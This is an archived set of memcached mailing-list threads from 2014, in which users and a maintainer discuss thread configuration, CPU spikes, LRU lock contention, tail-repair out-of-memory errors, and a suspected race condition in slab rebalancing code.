How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server
Re: Memcached instance and thread configuration parameters
No command can take up much time. If all other commands hang up, it's either a long-running stats command like I listed before, or a hang bug (though I don't know why it would recover on its own). We've fixed a lot of those since .13, so I'd still advocate upgrading at least some instances to see if they become immune to it. On Thu, 7 Aug 2014, Claudio Santana wrote: I think this issue has something to do with our access pattern (although we run very limited commands and not very high traffic either). We always start having issues on the same instance (I guess because of the system accessing a specific key). When we notice the issue we bounce the instance within 15/20 mins, I don't know if you think this is not enough time to recover. Sometimes the issue moves to other instaces in other servers (our client doesn't rebalance so the system is trying to access completely different keys). On the other servers sometimes the issue goes away on its own or the spike is not at 100pct. On Aug 7, 2014 6:36 PM, dormando dorma...@rydia.net wrote: Those three stats commands aren't problematic. The others I listed are. Sadly there aren't stats counters for them, I think... Are you sure it's not completely crashing after the CPU spike? it actually recovers on its own? On Thu, 7 Aug 2014, Claudio Santana wrote: I run every minute stats, stats items and stats slabs. the only commands executed are remove, incr, add, get, set and cas. I'm running now with 6 threads per instance with 3 per server and haven't had the issue again, not that this change fixed it. I'll definitely update. On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote: Please upgrade. If you have problems with the latest version we can look into it more. You can also look at command counters for odd commands being given: make sure nobody's running flushes, or stats sizes, or stats cachedump since those can cause CPU spikes and hangs. With 1.4.20 you can use stats conns to see what the connections are doing during the cpu spike. On Thu, 7 Aug 2014, Claudio Santana wrote: Forgot to say I'm running version 1.4.13 libevent 2.0.16-stable On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com wrote: Sorry for the late response. My CPU utilization normally is min 2.5% to 6.5% max. So it's interesting you ask this. The reason why I submitted the 1st question is because I've experienced some random CPU utilization spikes. From this about 6% CPU utilization all of the sudden it spikes to 100% and I can see the offending process is one of the Memcached instances. Sadly this CPU spike is accompanied by all requests timing out causing the whole system to become unusable. I collect minute by minute stats of all these memcached instances and according to my stats this issue happens within 2 minutes. I can see in the number of commands there's no increase in number of commands being issued right before the CPU spike nor increase in the number of bytes in/out. Does anybody have any ideas of what could be going on? I have all Memcached stats collected by minute in Graphite, I can provide other stats that could help explain this issue if necessary. On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote: You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. 
Sorry for the confusion, I don't have exact metrics per second but per minute: 1.12 million sets and 1.8 million gets, which translates to roughly 18,666 sets per second and 30,000 gets per second. These stats are per Memcached instance; I currently run 3 instances on each server. Claudio
Re: Export Control Classification Number (ECCN) of memcached 1.4
I have no idea what you're talking about. On Wed, 6 Aug 2014, skt8u...@gmail.com wrote: Dear All, I'm developing a system using memcached 1.4 and I'll release it to another country (Italy). Could you please give me the US Export Control Classification Number (ECCN) of memcached 1.4? I understand that there is basically no ECCN for open source software. Could you please confirm that? Thanks for your answer. Best regards, Tommy
Re: Memcached instance and thread configuration parameters
On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server/instance? Thanks, Claudio -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached instance and thread configuration parameters
You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio. On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote: On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server/instance? Thanks, Claudio -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: LRU lock per slab class
Hello Dormando, Thanks for the answer. The LRU fiddling only happens once a minute per item, so hot items don't affect the lock as much. The more you lean toward hot items the better it scales as-is. = For linked-list traversal, pthreads acquire item-partitioned lock. But threads acquire global lock for LRU update. So, all the GET commands that found requested item on the hash table tries to acquire the same lock, so, I think the total hit rate is more affecting factor to the lock contention than how often each item is touched for LRU update. I missed something?? The GET command only acquires the LRU lock if it's been more than a minute since the last time it was retrieved. That's all there is to it. I don't think anything stops it. Rebalance tends to stay within one class. It was on my list of scalability fixes to work on, but I postponed it for a few reasons. One is that most tend to have over half of their requests in one slab class. So splitting the lock doesn't give as much of a long term benefit. So, I wanted to come back to it later and see what other options were plausible for scaling the lru within a single slab class. Nobody's complained about the performance after the last round of work as well, so it stays low priority. Are your objects always only hit once per minute? What kind of performance are you seeing and what do you need to get out of it? = Thanks for your comments. I was trying to find some proper network speed(1Gb,10Gb) for current memcached operation. I saw the best performance around 4~6 threads (1.1M rps) with the help of multi-get. With the LRU out of the way it does go up to 12-16 threads. Also if you use numactl to pin it to one node it seems to do better... but most people just don't hit it that hard, so it doesn't matter? 2014년 8월 2일 토요일 오전 8시 19분 59초 UTC+9, Dormando 님의 말: On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungch...@gmail.com wrote: Hello, I'm testing the scalability of memcached-1.4.20 version in a GET dominated system. For a linked-list traversal in a hash table (do_item_get), it is protected by interleaved lock (per bucket), so it showed very high scalability. But, after linked-list traversal, LRU update is protected by a global lock (cache_lock), so the scalability was limited around 4~6 threads by global lock of the LRU update global in a Xeon server system (10Gb ethernet). The LRU fiddling only happens once a minute per item, so hot items don't affect the lock as much. The more you lean toward hot items the better it scales as-is. As i know, LRU is maintained per slab class, so LRU update modifies only the items contained in the same class. So, i think the global lock of LRU update may be changed to interleaved lock per slab class. By SET command at the same time, store and removal of items in the same class can happen concurrently, but SET operation also can be changed to get the slab class lock before adding/removing some new items to/from the slab class. In case of store/removal of the linked item in the hash table (which may reside on the different slab class), it only updates the h_next value of current item, and it does not touch LRU pointers (next, prev). So, i think it would be safe to change to interleaved lock. Are there any other reasons that LRU update requires a global lock that I missed ?? (I'm not using slab rebalance and giving an initial hash power value large enough, and clients only use GET, SET commands) I don't think anything stops it. Rebalance tends to stay within one class. 
It was on my list of scalability fixes to work on, but I postponed it for a few reasons. One is that most tend to have over half of their requests in one slab class. So splitting the lock doesn't give as much of a long term benefit. So, I wanted to come back to it later and see what other options were plausible for scaling the lru within a single slab class. Nobody's complained about the performance after the last round of work as well, so it stays low priority. Are your objects always only hit once per minute? What kind of performance are you seeing and what do you need to get out of it? It would be highly appreciated for any comments!!
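To illustrate the lock split being discussed above (replacing the single global cache_lock used for LRU link/unlink with one mutex per slab class), here is a minimal sketch. It shows only the idea, not memcached's code; the names lru_locks, lru_lock and lru_unlock are hypothetical.

/* Minimal sketch of per-slab-class LRU locks (hypothetical names, not the
 * actual memcached source). */
#include <pthread.h>

#define MAX_SLAB_CLASSES 64                       /* assumed upper bound */
static pthread_mutex_t lru_locks[MAX_SLAB_CLASSES];

void lru_locks_init(void) {
    for (int i = 0; i < MAX_SLAB_CLASSES; i++)
        pthread_mutex_init(&lru_locks[i], NULL);
}

/* GET-path LRU bumps and SET-path link/unlink would both take only the
 * lock for the class the item lives in, so traffic spread across classes
 * no longer serializes on one global mutex. */
static inline void lru_lock(unsigned int clsid)   { pthread_mutex_lock(&lru_locks[clsid]); }
static inline void lru_unlock(unsigned int clsid) { pthread_mutex_unlock(&lru_locks[clsid]); }

/* usage, e.g. inside item update / link / unlink:
 *   lru_lock(it->slabs_clsid);
 *   ... splice the item in or out of that class's LRU list ...
 *   lru_unlock(it->slabs_clsid);
 */

As the thread notes, this only helps when requests are spread across classes; with most traffic landing in one class, everything still funnels through that single class's lock.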
Re: LRU lock per slab class
On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungchul.h...@gmail.com wrote: Hello, I'm testing the scalability of memcached-1.4.20 version in a GET dominated system. For a linked-list traversal in a hash table (do_item_get), it is protected by interleaved lock (per bucket), so it showed very high scalability. But, after linked-list traversal, LRU update is protected by a global lock (cache_lock), so the scalability was limited around 4~6 threads by global lock of the LRU update global in a Xeon server system (10Gb ethernet). The LRU fiddling only happens once a minute per item, so hot items don't affect the lock as much. The more you lean toward hot items the better it scales as-is. As i know, LRU is maintained per slab class, so LRU update modifies only the items contained in the same class. So, i think the global lock of LRU update may be changed to interleaved lock per slab class. By SET command at the same time, store and removal of items in the same class can happen concurrently, but SET operation also can be changed to get the slab class lock before adding/removing some new items to/from the slab class. In case of store/removal of the linked item in the hash table (which may reside on the different slab class), it only updates the h_next value of current item, and it does not touch LRU pointers (next, prev). So, i think it would be safe to change to interleaved lock. Are there any other reasons that LRU update requires a global lock that I missed ?? (I'm not using slab rebalance and giving an initial hash power value large enough, and clients only use GET, SET commands) I don't think anything stops it. Rebalance tends to stay within one class. It was on my list of scalability fixes to work on, but I postponed it for a few reasons. One is that most tend to have over half of their requests in one slab class. So splitting the lock doesn't give as much of a long term benefit. So, I wanted to come back to it later and see what other options were plausible for scaling the lru within a single slab class. Nobody's complained about the performance after the last round of work as well, so it stays low priority. Are your objects always only hit once per minute? What kind of performance are you seeing and what do you need to get out of it? It would be highly appreciated for any comments!! -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
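For reference, the "once a minute per item" behaviour mentioned above comes from the bump-rate check in do_item_update. A condensed sketch follows; the constant matches memcached's ITEM_UPDATE_INTERVAL, but the body is simplified and details vary by version.

/* Condensed sketch of the rate-limited LRU bump in items.c (details vary
 * by version). Hot keys fail the age check almost every time, so they
 * rarely touch cache_lock at all. */
#define ITEM_UPDATE_INTERVAL 60              /* seconds */

void do_item_update(item *it) {
    if (it->time < current_time - ITEM_UPDATE_INTERVAL) {
        mutex_lock(&cache_lock);             /* the global lock under discussion */
        if ((it->it_flags & ITEM_LINKED) != 0) {
            item_unlink_q(it);               /* remove from its class's LRU      */
            it->time = current_time;         /* refresh the last-access time     */
            item_link_q(it);                 /* re-insert at the LRU head        */
        }
        mutex_unlock(&cache_lock);
    }
}

So a GET only contends on cache_lock when the item it found has not been bumped within the last minute, which is why a workload of very hot keys scales better on the current code than one where every key is touched roughly once per minute.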
Re: tail repair issue (1.4.20)
Dormando,Sure, I waited till Monday (our usual tailrepair/oom errors day) but we did not have any issues today :). I will continue to monitor and will grab stats conns next time. Great, thanks! As for network issues during the last time - i do not see any but still trying to find. This can be good explanation why we have such events grouped in time. As for keepalive - we use default php-memcached/libmemcached setting (do not change it) and as I see libmemcached does not set SO_KEEPALIVE. Do you recommend to set it? Lets see what stats conns says first. I guess it's theoretically possible that an item was leaked, but was actually fetched (and expired properly) at some point, fixing the issue. Would've still leaked the item though. So if 'stats conns' doesn't show some hung clients we might still have a reference leak somewhere. Which would be sad since Steven Grimm fixed a number of them just recently.. On Wednesday, July 2, 2014 7:32:14 PM UTC-7, Dormando wrote: Thanks! This is a little exciting actually, it's a new bug! tailrepairs was only necessary when an item was legitimately leaked; if we don't reap it, it never gets better. However you stated that for three hours all sets fail (and at the same time some .15's crashed). Then it self-recovered. The .15 crashes were likely from the bug I fixed; where an active item is fetched from the tail, but then reclaimed because it's old. The .20 OOM is the defensive code working perfectly; something has somehow retained a legitimate reference to an item for multiple hours! More than one even, since the tail is walked up by several items while looking for something to free. Did you have any network blips, application server crashes, or the like? It sounds like some connections are dying in such a way that they time out, which is a very long timeout somehow (no tcp keepalives?). What's *extra* exciting is that 1.4.20 now has the stats conns command. If this happens again, while a .20 machine is actively OOM'ing, can you grab a couple copies of the stats conns output, a few minutes apart? That should definitively tell us if there are stuck connections causing this issue. Someone had a PR open for adding idle connection timeouts, but I asked them to redo it on top of the 'stats conns' work as a more efficient background thread. I could potentially finish this and it would be usable as a workaround. You could also enable tcp keepalives, or otherwise fix whatever's causing these events. I wonder if it's also worth attempting to relink an item that ends up in the tail but has references? That would at least potentially get them out of the way of memory reclamation. Thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: 1) OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? correct 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? sent you _current_ stats from the server that had OOM couple days ago and still running (now with no issues). 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? correct we will enable saving stderr to log. may be this can show something. If you have any other ideas - let me know. -denis On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote: Cool. That is disappointing. Can you clarify a few things for me: 1) You're saying that you were getting OOM's on slab 13, but it recovered on its own? 
This is under version 1.4.20 and you did *not* enable tail repairs? 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? If it's not a crash, and your hash power level isn't expanding, I don't think it's related to the other bug. thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: Dormando, sure, we will add the option to presize the hash table (as I see, nn should be 26). One question: as I see in the logs for these servers, there is no change in hash_power_level before the incident (it would be hard to say for the crashed ones, but .20 just had out-of-memory errors and I have solid stats). Doesn't this contradict the idea of the cause? Server had
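The idle-connection-timeout idea mentioned above (redoing the PR as a background thread on top of the 'stats conns' work) would look roughly like the sketch below. This is only a sketch of the concept; every name in it (conns, last_cmd_time, conn_request_close, idle_timeout) is hypothetical and not the eventual implementation.

/* Rough sketch of an idle-connection reaper thread (all names hypothetical;
 * not the actual memcached implementation). */
#include <pthread.h>
#include <unistd.h>

extern conn **conns;                 /* assumed: connection table indexed by fd */
extern int max_fds;                  /* assumed: size of that table             */
extern volatile rel_time_t current_time;
static int idle_timeout = 600;       /* seconds; hypothetical tunable           */

static void *conn_timeout_thread(void *arg) {
    (void)arg;
    for (;;) {
        for (int fd = 0; fd < max_fds; fd++) {
            conn *c = conns[fd];
            if (c == NULL || c->state == conn_closed)
                continue;
            /* last_cmd_time would be stamped on every parsed command */
            if (current_time - c->last_cmd_time > idle_timeout) {
                /* ask the owning worker to close it, so teardown stays
                 * local to one thread */
                conn_request_close(c);
            }
        }
        sleep(60);                   /* one full sweep a minute is plenty */
    }
    return NULL;
}

Such a thread would be started once at startup (like the other background threads) and would reap hung clients like the ones suspected in this thread instead of letting them pin items for hours.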
Re: slab re-balance seems not thread-safty
Seems like you're right.. I'd re-arranged where the LRU lock (cache_lock) is called then forgot to update that one bit. Most of the do_item_unlink code is safe there, until it gets into the LRU bits. It's unlikely anyone actually saw a crash from this as it's a narrow race though. That's easy to fix. It's still necessary to delete it, since threads can stack around a handful of objects and cause rebalance to hang. Thanks! On Thu, 3 Jul 2014, Zhiwei Chan wrote: the item lock can only protect the hash list, but what about the LRU list? As far as i know, if trying to delete a node from a doubly-linked-list, it is necessary to lock at least 3 node: node, node-pre, node-next. I will try to check if it may crash the LRU list in gdb next week . And I think in do_item_get it is not necessary to delete the item that is re-balanced, just leave it there and return NULL seems better. 在 2014年7月3日星期四UTC+8下午1时30分29秒,Dormando写道: the item lock is already held for that key when do_item_get is called, which is why the nolock code is called there. slab rebalance has that second short-circuiting of fetches to ensure very hot items don't permanently jam a page move. On Wed, 2 Jul 2014, Zhiwei Chan wrote: Hi all, I have thought carefully about the the thread-safe memcached recently, and found that if the re-balance is running, it may not thread-safety. The code do_item_get-do_item_unlink_nolock may corrupt the hash table. Whenever it trying to modify the hash table, it should get cache_lock, but the function do_item_get have not got the cache_lock. Please tell me if anything i neglected. /** wrapper around assoc_find which does the lazy expiration logic */ item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) { //mutex_lock(cache_lock); item *it = assoc_find(key, nkey, hv); if (it != NULL) { refcount_incr(it-refcount); /* Optimization for slab reassignment. prevents popular items from * jamming in busy wait. Can only do this here to satisfy lock order * of item_lock, cache_lock, slabs_lock. */ if (slab_rebalance_signal ((void *)it = slab_rebal.slab_start (void *)it slab_rebal.slab_end)) { do_item_unlink_nolock(it, hv); --- no lock before unlink. do_item_remove(it); it = NULL; } } -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
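The "easy to fix" change described above amounts to taking the LRU lock before that unlink. A sketch of that shape follows (not necessarily the committed patch; it keeps the item_lock, cache_lock order the original comment requires):

/* Sketch of the fix being discussed (shape only, not necessarily the
 * committed patch): hold cache_lock while unlinking an item that sits in
 * the slab page currently being rebalanced, so the LRU doubly-linked list
 * cannot be spliced concurrently. */
if (slab_rebalance_signal &&
    ((void *)it >= slab_rebal.slab_start && (void *)it < slab_rebal.slab_end)) {
    mutex_lock(&cache_lock);
    do_item_unlink_nolock(it, hv);   /* hash removal was already safe under the
                                        item lock; it is the LRU splice that
                                        needs cache_lock */
    mutex_unlock(&cache_lock);
    do_item_remove(it);
    it = NULL;
}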
Re: tail repair issue (1.4.20)
Cool. That is disappointing. Can you clarify a few things for me: 1) You're saying that you were getting OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? If it's not a crash, and your hash power level isn't expanding, I don't think it's related to the other bug. thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: Dormando, sure, we will add option to preset hashtable. (as i see nn should be 26). One question: as i see in logs for the servers there is no change for hash_power_level before incident (it would be hard to say for crushed but .20 just had outofmemory and i have solid stats). Does not this contradict the idea of cause? Server had hash_power_level = 26 for days before and still has 26 days after. Just for three hours every set for slab 13 failed. We did not reboot/flush server and it continues to work without problem. What do you think? On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote: Hey, Can you presize the hash table? (-o hashpower=nn) to be large enough on those servers such that hash expansion won't happen at runtime? You can see what hashpower is on a long running server via stats to know what to set the value to. If that helps, we might still have a bug in hash expansion. I see someone finally reproduced a possible issue there under .20. .17/.19 fix other causes of the problem pretty thoroughly though. On Tue, 1 Jul 2014, Denis Samoylov wrote: Hi, We had sporadic memory corruption due tail repair in pre .20 version. So we updated some our servers to .20. This Monday we observed several crushes in .15 version and tons of allocation failure in .20 version. This is expected as .20 just disables tail repair but it seems the problem is still there. What is interesting: 1) there is no visible change in traffic and only one slab is affected usually. 2) this always happens with several but not all servers :) Is there any way to catch this and help with debug? I have all slab and item stats for the time around incident for .15 and .20 version. .15 is clearly memory corruption: gdb shows that hash function returned 0 (line 115 uint32_t hv = hash(ITEM_key(search), search-nkey, 0);). so we seems hitting this comment: /* Old rare bug could cause a refcount leak. We haven't seen * it in years, but we leave this code in to prevent failures * just in case */ :) Thank you, Denis -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Thanks! This is a little exciting actually, it's a new bug! tailrepairs was only necessary when an item was legitimately leaked; if we don't reap it, it never gets better. However you stated that for three hours all sets fail (and at the same time some .15's crashed). Then it self-recovered. The .15 crashes were likely from the bug I fixed; where an active item is fetched from the tail, but then reclaimed because it's old. The .20 OOM is the defensive code working perfectly; something has somehow retained a legitimate reference to an item for multiple hours! More than one even, since the tail is walked up by several items while looking for something to free. Did you have any network blips, application server crashes, or the like? It sounds like some connections are dying in such a way that they time out, which is a very long timeout somehow (no tcp keepalives?). What's *extra* exciting is that 1.4.20 now has the stats conns command. If this happens again, while a .20 machine is actively OOM'ing, can you grab a couple copies of the stats conns output, a few minutes apart? That should definitively tell us if there are stuck connections causing this issue. Someone had a PR open for adding idle connection timeouts, but I asked them to redo it on top of the 'stats conns' work as a more efficient background thread. I could potentially finish this and it would be usable as a workaround. You could also enable tcp keepalives, or otherwise fix whatever's causing these events. I wonder if it's also worth attempting to relink an item that ends up in the tail but has references? That would at least potentially get them out of the way of memory reclamation. Thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: 1) OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? correct 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? sent you _current_ stats from the server that had OOM couple days ago and still running (now with no issues). 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? correct we will enable saving stderr to log. may be this can show something. If you have any other ideas - let me know. -denis On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote: Cool. That is disappointing. Can you clarify a few things for me: 1) You're saying that you were getting OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? If it's not a crash, and your hash power level isn't expanding, I don't think it's related to the other bug. thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: Dormando, sure, we will add option to preset hashtable. (as i see nn should be 26). One question: as i see in logs for the servers there is no change for hash_power_level before incident (it would be hard to say for crushed but .20 just had outofmemory and i have solid stats). Does not this contradict the idea of cause? Server had hash_power_level = 26 for days before and still has 26 days after. Just for three hours every set for slab 13 failed. We did not reboot/flush server and it continues to work without problem. What do you think? 
On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote: Hey, Can you presize the hash table? (-o hashpower=nn) to be large enough on those servers such that hash expansion won't happen at runtime? You can see what hashpower is on a long running server via stats to know what to set the value to. If that helps, we might still have a bug in hash expansion. I see someone finally reproduced a possible issue there under .20. .17/.19 fix other causes of the problem pretty thoroughly though. On Tue, 1 Jul 2014, Denis Samoylov wrote: Hi, We had sporadic memory corruption due tail repair in pre .20 version. So we updated some our servers to .20. This Monday we observed several crushes in .15 version and tons of allocation failure in .20 version. This is expected as .20 just disables tail repair but it seems the problem is still there. What is interesting: 1) there is no visible change in traffic and only one slab is affected usually. 2
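For context on why a single stuck reference shows up as hours of failed sets on one slab class: when a class has no free chunks, the allocator only examines a handful of items up from the LRU tail looking for something it can expire or evict, and it skips anything still referenced. A condensed fragment of that search (constants and details vary by version):

/* Condensed sketch of the tail search inside do_item_alloc (details vary
 * by version): walk a few items up from the class's LRU tail; anything
 * still referenced by a connection is skipped. */
int tries = 5;
item *search;
item *victim = NULL;
for (search = tails[id]; tries > 0 && search != NULL;
     tries--, search = search->prev) {
    if (refcount_incr(&search->refcount) != 2) {
        /* Someone else still holds a reference. With tail repairs disabled
         * (the 1.4.20 default) a leaked or long-stuck reference here just
         * keeps blocking eviction. */
        refcount_decr(&search->refcount);
        continue;
    }
    victim = search;                 /* expired or evictable: reuse its memory */
    break;
}
if (victim == NULL) {
    /* Nothing freeable within reach of the tail and no free chunks left:
     * the store fails, which clients see as
     * SERVER_ERROR out of memory storing object. */
}

That is why only one slab class fails at a time, and why the errors stop on their own the moment the stuck connection finally dies and drops its references.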
Re: slab re-balance seems not thread-safty
the item lock is already held for that key when do_item_get is called, which is why the nolock code is called there. slab rebalance has that second short-circuiting of fetches to ensure very hot items don't permanently jam a page move. On Wed, 2 Jul 2014, Zhiwei Chan wrote: Hi all, I have thought carefully about the the thread-safe memcached recently, and found that if the re-balance is running, it may not thread-safety. The code do_item_get-do_item_unlink_nolock may corrupt the hash table. Whenever it trying to modify the hash table, it should get cache_lock, but the function do_item_get have not got the cache_lock. Please tell me if anything i neglected. /** wrapper around assoc_find which does the lazy expiration logic */ item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) { //mutex_lock(cache_lock); item *it = assoc_find(key, nkey, hv); if (it != NULL) { refcount_incr(it-refcount); /* Optimization for slab reassignment. prevents popular items from * jamming in busy wait. Can only do this here to satisfy lock order * of item_lock, cache_lock, slabs_lock. */ if (slab_rebalance_signal ((void *)it = slab_rebal.slab_start (void *)it slab_rebal.slab_end)) { do_item_unlink_nolock(it, hv); --- no lock before unlink. do_item_remove(it); it = NULL; } } -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
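For readability, here is the snippet quoted above with the C operators the archive stripped (->, &, &&, >=, <) restored; this is the shape of do_item_get in the 1.4.20 source the question refers to:

/** wrapper around assoc_find which does the lazy expiration logic */
item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) {
    //mutex_lock(&cache_lock);
    item *it = assoc_find(key, nkey, hv);
    if (it != NULL) {
        refcount_incr(&it->refcount);
        /* Optimization for slab reassignment. prevents popular items from
         * jamming in busy wait. Can only do this here to satisfy lock order
         * of item_lock, cache_lock, slabs_lock. */
        if (slab_rebalance_signal &&
            ((void *)it >= slab_rebal.slab_start &&
             (void *)it < slab_rebal.slab_end)) {
            do_item_unlink_nolock(it, hv);   /* <-- no lock before unlink */
            do_item_remove(it);
            it = NULL;
        }
    }
    /* ...lazy-expiration logic and return follow... */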
Re: tail repair issue (1.4.20)
Hey, Can you presize the hash table? (-o hashpower=nn) to be large enough on those servers such that hash expansion won't happen at runtime? You can see what hashpower is on a long running server via stats to know what to set the value to. If that helps, we might still have a bug in hash expansion. I see someone finally reproduced a possible issue there under .20. .17/.19 fix other causes of the problem pretty thoroughly though. On Tue, 1 Jul 2014, Denis Samoylov wrote: Hi, We had sporadic memory corruption due tail repair in pre .20 version. So we updated some our servers to .20. This Monday we observed several crushes in .15 version and tons of allocation failure in .20 version. This is expected as .20 just disables tail repair but it seems the problem is still there. What is interesting: 1) there is no visible change in traffic and only one slab is affected usually. 2) this always happens with several but not all servers :) Is there any way to catch this and help with debug? I have all slab and item stats for the time around incident for .15 and .20 version. .15 is clearly memory corruption: gdb shows that hash function returned 0 (line 115 uint32_t hv = hash(ITEM_key(search), search-nkey, 0);). so we seems hitting this comment: /* Old rare bug could cause a refcount leak. We haven't seen * it in years, but we leave this code in to prevent failures * just in case */ :) Thank you, Denis -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit 